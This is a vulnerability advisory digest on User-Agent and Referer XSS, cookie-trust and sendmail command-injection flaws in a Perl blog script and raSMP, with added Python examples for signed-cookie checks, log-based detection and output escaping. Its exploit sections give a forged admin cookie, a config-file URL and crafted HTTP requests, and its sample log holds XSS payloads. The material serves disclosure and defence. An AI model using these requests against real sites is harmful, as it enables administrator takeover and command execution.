Recent Useragent XSS vulnerabilities
Here is a short summary of recent User-Agent XSS vulnerabilities discovered by the eVuln team. The full list with details is available on the eVuln Security Advisories page.
Multiple flaws in Leif M. Wright Blog.
Description.
All "txt" files are unprotected by .htaccess (or any other means) in the default installation. This can be used to retrieve the administrator's password from the config file.
The "blog.cgi" script does not compare the password when identifying the administrator by cookie; the cookie value alone is trusted.
The administrator can edit the blog configuration, including the full path to the sendmail program. This can be used to execute arbitrary shell commands.
System access is possible.
The environment variables HTTP_REFERER and HTTP_USER_AGENT are not properly sanitized. An HTTP request can therefore be sent with fake Referer or User-Agent values that contain arbitrary HTML or script code. This code is executed when the administrator opens the "Log" page.
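The cookie-trust flaw described above, as an added Python example; this is not code from Leif M. Wright's Blog (which is a Perl CGI) and does not reproduce its fix. The cookie name and value blogAdmin=true come from the exploit section below; the signed-token scheme, the role string "admin" and the secret are assumptions made for the example.

```python
"""Added example, not the blog's own code: an admin check that trusts a
client-supplied flag, beside a check that only accepts a server-issued,
HMAC-tagged cookie. The blogAdmin=true cookie is from the advisory; the
signed-token scheme and the secret are assumptions for this example."""
import hashlib
import hmac
from typing import Dict

# Constructed secret for the example; a real deployment loads this from a
# file the web server cannot serve (the opposite of the unprotected .txt files).
SERVER_SECRET = b"example-secret-do-not-reuse"

# Role string carried in the cookie; an assumption, not something the blog uses.
ADMIN_ROLE = "admin"


def is_admin_vulnerable(cookies: Dict[str, str]) -> bool:
    """The flaw: the admin decision rests on a flag the client chooses, so any
    visitor who sends 'Cookie: blogAdmin=true' is treated as administrator and
    no password is ever compared."""
    return cookies.get("blogAdmin") == "true"


def make_admin_cookie(secret: bytes = SERVER_SECRET) -> str:
    """Issue a cookie the server can verify later: role plus an HMAC over it.
    Only code holding the secret (the server, after a real login) can mint it."""
    tag = hmac.new(secret, ADMIN_ROLE.encode(), hashlib.sha256).hexdigest()
    return f"{ADMIN_ROLE}:{tag}"


def is_admin_fixed(cookies: Dict[str, str], secret: bytes = SERVER_SECRET) -> bool:
    """Hardened form: accept only a cookie whose tag equals the server's HMAC
    over the role, compared in constant time. A forged 'true', a wrong role or
    a guessed tag is rejected; nothing the client writes is trusted by itself."""
    value = cookies.get("blogAdmin", "")
    role, sep, tag = value.partition(":")
    if not sep or role != ADMIN_ROLE:
        return False
    expected = hmac.new(secret, role.encode(), hashlib.sha256).hexdigest()
    # compare_digest on bytes avoids both timing leaks and TypeErrors on
    # non-ASCII input; differing lengths simply compare unequal.
    return hmac.compare_digest(tag.encode(), expected.encode())


if __name__ == "__main__":
    forged = {"blogAdmin": "true"}
    print("vulnerable check, forged cookie:", is_admin_vulnerable(forged))
    print("fixed check, forged cookie:     ", is_admin_fixed(forged))
    print("fixed check, issued cookie:     ",
          is_admin_fixed({"blogAdmin": make_admin_cookie()}))
```

The point is the direction of trust: in the vulnerable form the client asserts its own privilege; in the fixed form the client can only return what the server signed, and the server recomputes the tag rather than comparing anything the client controls.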
Exploit.
URL example (unprotected config file):
http://[host]/cgi-bin/blog/blogconfig.txt
Cookie that is accepted as administrator without a password check:
Cookie: blogAdmin=true
Configuration value that runs a command in place of sendmail:
Sendmail: /bin/ls
HTTP query with script code in the Referer and User-Agent headers:
GET /cgi-bin/blog/blog.cgi HTTP/1.0
Host: [host]
Referer: [XSS]
User-Agent: [XSS]
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
file=15-13.59.39.txt&year=2006&month=February&name=zz&comment=zzz&submit=Enter%20my%20comment
Solution.
No solution is available.
UserAgent XSS Vulnerability in raSMP.
Description.
Vulnerable scripts:
- common.php
- common/functions.php
- admin/stats.php
The variable $_SERVER['HTTP_USER_AGENT'] is not properly sanitized. An HTTP request can therefore be sent with a fake User-Agent value that contains arbitrary HTML or script code. This code is executed when the administrator opens Site Statistics.
The administrator's authentication is threatened.
Exploit.
HTTP query:
GET /path/index.php HTTP/1.0
Host: rasmphost
User-Agent: <XSS>
Solution.
No patch available.
Edit the source code: the variable $_SERVER['HTTP_USER_AGENT'] needs additional sanitization (HTML-escape it before it is written into the page).
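The header-to-page path that both advisories describe (Referer and User-Agent written unescaped into the blog's "Log" page, and $_SERVER['HTTP_USER_AGENT'] into raSMP's Site Statistics), as an added Python example; this is not eVuln's, the blog's or raSMP's code. It assumes an Apache/nginx combined-format access log and a statistics page that is a plain HTML table; the log lines are constructed for the example and use documentation addresses. It shows a log scan that flags header values carrying HTML or script (for spotting attempts against either application) and the unsafe rendering beside the hardened one, which is the additional sanitization the solution calls for.

```python
"""Added example, not code from either advisory's product: Referer/User-Agent
are attacker-controlled input. This scans a combined-format access log for
header values that carry HTML/script, then renders a stats table the way the
vulnerable pages do (raw) and the way they should (escaped). Log lines are
constructed for the example."""
import html
import re
from typing import Dict, Iterable, List

# Constructed sample access log (combined format). Lines 3 and 4 carry payloads
# of the kind the advisories describe, in the Referer and User-Agent fields.
SAMPLE_LOG = r'''
203.0.113.5 - - [10/Feb/2006:13:59:39 +0000] "GET /cgi-bin/blog/blog.cgi HTTP/1.0" 200 5120 "http://example.org/" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.7 - - [10/Feb/2006:14:02:11 +0000] "GET /path/index.php HTTP/1.0" 200 2048 "-" "Mozilla/5.0 (X11; Linux i686) Firefox/1.5"
203.0.113.9 - - [10/Feb/2006:14:05:01 +0000] "GET /cgi-bin/blog/blog.cgi HTTP/1.0" 200 5120 "<script>alert(1)</script>" "Mozilla/4.0"
203.0.113.9 - - [10/Feb/2006:14:06:43 +0000] "GET /path/index.php HTTP/1.0" 200 2048 "-" "<img src=x onerror=alert(document.cookie)>"
'''.strip()

# Apache/nginx "combined" log format: the last two quoted fields are the
# Referer and User-Agent exactly as the client sent them.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Markup metacharacters (and a javascript: URL) have no place in a legitimate
# Referer or User-Agent; quotes matter when the value lands inside an attribute.
SUSPICIOUS = re.compile(r'''[<>"']|javascript:''', re.IGNORECASE)


def parse_combined(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in lines:
        m = COMBINED_RE.match(line.rstrip("\n"))
        if m:
            entries.append(m.groupdict())
    return entries


def flag_header_injection(entries: List[Dict[str, str]]):
    """Return (ip, field, value) for every Referer/User-Agent that looks like a
    payload; this is the detection side, run over the web server's own log."""
    hits = []
    for e in entries:
        for field in ("referer", "ua"):
            if SUSPICIOUS.search(e[field]):
                hits.append((e["ip"], field, e[field]))
    return hits


def render_stats_unsafe(entries: List[Dict[str, str]]) -> str:
    """What the vulnerable Log/Site Statistics pages effectively do: interpolate
    the raw header values into HTML, so the payload runs in the admin's browser."""
    rows = "".join(
        f"<tr><td>{e['referer']}</td><td>{e['ua']}</td></tr>" for e in entries
    )
    return f"<table>{rows}</table>"


def render_stats_safe(entries: List[Dict[str, str]]) -> str:
    """Hardened form: HTML-escape every header value at the point of output, so
    <, >, &, quotes become entities and are displayed rather than parsed."""
    rows = "".join(
        f"<tr><td>{html.escape(e['referer'], quote=True)}</td>"
        f"<td>{html.escape(e['ua'], quote=True)}</td></tr>"
        for e in entries
    )
    return f"<table>{rows}</table>"


if __name__ == "__main__":
    entries = parse_combined(SAMPLE_LOG.splitlines())
    for ip, field, value in flag_header_injection(entries):
        print(f"possible header XSS from {ip} in {field}: {value!r}")
    print("unsafe page contains raw <script>:",
          "<script>" in render_stats_unsafe(entries))
    print("safe page contains raw <script>:  ",
          "<script>" in render_stats_safe(entries))
```

Escaping belongs at output, in the template that builds the statistics or log page, not at input: the same stored User-Agent may later be written into HTML, a CSV export or a shell command, and each sink needs its own encoding. The log scan is a cheap retrospective check; a payload in the log means the admin page has already been poisoned unless the output is escaped.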